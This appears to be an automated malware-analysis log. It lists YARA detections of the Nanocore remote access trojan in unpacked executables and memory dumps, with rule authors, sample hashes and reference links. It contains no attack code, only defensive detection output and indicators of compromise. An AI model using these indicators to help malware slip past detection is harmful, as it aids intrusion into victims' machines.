Source: 0.3.wIQLBHYbqz.exe.39cbe78.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.3.wIQLBHYbqz.exe.39cbe78.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.424e424.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.424e424.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.wIQLBHYbqz.exe.38c4300.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.wIQLBHYbqz.exe.38c4300.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.wIQLBHYbqz.exe.38c4300.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.3.RMActivate_isv.exe.bat.3668768.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.3.RMActivate_isv.exe.bat.3668768.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.3.RMActivate_isv.exe.bat.3668768.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.3.wIQLBHYbqz.exe.39cb008.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.3.wIQLBHYbqz.exe.39cb008.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.3.wIQLBHYbqz.exe.39cb008.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.3.wIQLBHYbqz.exe.39cbe78.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.3.wIQLBHYbqz.exe.39cbe78.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.3.wIQLBHYbqz.exe.39cbe78.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.3.RMActivate_isv.exe.bat.35a0a20.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.3.RMActivate_isv.exe.bat.35a0a20.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.3.RMActivate_isv.exe.bat.35a0a20.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.3.RMActivate_isv.exe.bat.3668768.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.3.RMActivate_isv.exe.bat.3668768.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.3.RMActivate_isv.exe.bat.3668768.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.3.RMActivate_isv.exe.bat.3668768.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.3.RMActivate_isv.exe.bat.3668768.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegAsm.exe.424e424.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.424e424.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegAsm.exe.32116dc.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.32116dc.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegAsm.exe.4252a4d.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.4252a4d.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.3.RMActivate_isv.exe.bat.3668768.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.3.RMActivate_isv.exe.bat.3668768.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.3.RMActivate_isv.exe.bat.3668768.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.wIQLBHYbqz.exe.14a0000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.wIQLBHYbqz.exe.14a0000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.wIQLBHYbqz.exe.14a0000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.3.RMActivate_isv.exe.bat.3668768.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.RegAsm.exe.30a3c68.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.RegAsm.exe.30a3c68.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegAsm.exe.40c95ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.RegAsm.exe.40c95ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegAsm.exe.40c95ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.3.wIQLBHYbqz.exe.39cbe78.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.3.wIQLBHYbqz.exe.39cbe78.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.3.wIQLBHYbqz.exe.39cbe78.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.3.RMActivate_isv.exe.bat.35d3428.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.3.RMActivate_isv.exe.bat.35d3428.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.3.RMActivate_isv.exe.bat.35d3428.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.3.RMActivate_isv.exe.bat.35d3428.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.3.RMActivate_isv.exe.bat.35d3428.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.3.RMActivate_isv.exe.bat.35d3428.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.3.RMActivate_isv.exe.bat.356e018.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.3.RMActivate_isv.exe.bat.356e018.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.617258087.0000000005B70000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.617258087.0000000005B70000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000E.00000003.581083346.0000000003668000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000003.581083346.0000000003668000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000003.453308954.000000000399F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000003.453308954.000000000399F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000016.00000002.611459498.0000000003081000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000003.580718643.0000000003611000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000003.580718643.0000000003611000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000003.452029104.0000000003975000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000003.452029104.0000000003975000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.614749797.00000000016E2000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000002.614749797.00000000016E2000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.614883445.00000000014A2000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.614883445.00000000014A2000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.609808438.0000000000402000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.609808438.0000000000402000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000016.00000002.609719074.0000000000402000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000016.00000002.609719074.0000000000402000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000003.580844038.0000000003B80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000003.580844038.0000000003B80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.617706572.0000000003910000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.617706572.0000000003910000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000003.592051979.0000000003562000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000003.592051979.0000000003562000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000003.580617027.00000000035B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
